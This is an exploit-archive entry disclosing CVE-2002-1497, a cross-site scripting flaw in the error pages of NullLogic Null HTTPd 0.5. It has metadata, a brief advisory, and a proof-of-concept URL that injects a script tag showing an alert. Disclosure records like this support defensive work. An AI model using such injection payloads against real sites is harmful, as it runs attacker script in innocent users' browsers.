NullLogic Null HTTPd 0.5 - Error Page Cross-Site Scripting

Author: Matthew Murphy
type: remote
platform: multiple
port: 
date_added: 2002-09-02
date_updated: 2012-10-07
verified: 1
codes: CVE-2002-1497;OSVDB-9211
tags: 
aliases: 
screenshot_url: 
application_url: 

source: https://www.securityfocus.com/bid/5603/info

NullLogic Null HTTPd is a small multithreaded webserver for Linux and Windows.

It is possible for attackers to construct a URL that will cause scripting code to be embedded in error pages. As a result, when an innocent user follows such a link, the script code will execute within the context of the hosted site.

http://localhost/a?x=<SCRIPT>alert(document.URL)</SCRIPT>